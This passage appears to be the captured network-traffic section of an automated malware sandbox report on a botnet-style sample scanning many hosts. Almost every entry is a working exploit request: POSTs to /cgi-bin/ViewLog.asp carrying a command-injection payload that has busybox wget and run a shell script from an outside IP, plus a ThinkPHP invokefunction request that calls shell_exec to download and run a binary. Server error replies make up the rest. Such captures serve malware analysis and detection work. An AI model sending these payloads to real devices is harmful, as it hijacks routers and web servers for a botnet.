                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:29.217771053 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:37.152503014 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:52.766486883 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:25.017853975 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        152192.168.2.234963295.142.160.968080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:22.264147043 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:22.583870888 CEST1175INHTTP/1.1 404 Not Found
                                                        Server: Apache-Coyote/1.1
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Length: 1012
                                                        Date: Sun, 14 Apr 2024 14:28:30 GMT
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 32 34 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 28 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 29 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 32 34 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>Apache Tomcat/6.0.24 - Error report</title><style>...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - /cgi-bin/ViewLog.asp</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>/cgi-bin/ViewLog.asp</u></p><p><b>description</b> <u>The requested resource (/cgi-bin/ViewLog.asp) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/6.0.24</h3></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        153192.168.2.234087862.192.143.1728080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:22.268712044 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:22.586747885 CEST135INHTTP/1.1 404 Not Found
                                                        server: owsd
                                                        content-type: text/html
                                                        content-length: 38
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><body><h1>404</h1></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        154192.168.2.235596894.120.163.168080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:22.289309978 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        155192.168.2.233343494.121.132.2368080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:22.293138981 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        156192.168.2.234662094.120.46.1418080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:22.294409990 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        157192.168.2.235198231.28.235.428080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:22.316190004 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:22.684906006 CEST224INHTTP/1.1 403 Forbidden
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 106
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        158192.168.2.233702694.238.153.1578080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:22.542493105 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:23.458393097 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:25.250197887 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        159192.168.2.235518694.121.151.998080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:22.633184910 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        160192.168.2.235167431.24.86.38080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:22.703572035 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:26.657900095 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:31.265295982 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:40.480068922 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:00.445288897 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:37.304274082 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        161192.168.2.235289094.29.160.1628080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:22.967008114 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:35:23.401218891 CEST313INHTTP/1.1 403 Forbidden
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 106
                                                        Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
                                                        Apr 14, 2024 16:35:24.678798914 CEST313INHTTP/1.1 403 Forbidden
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 106
                                                        Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        162192.168.2.233762095.100.117.8080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:35:23.012227058 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:35:23.328085899 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
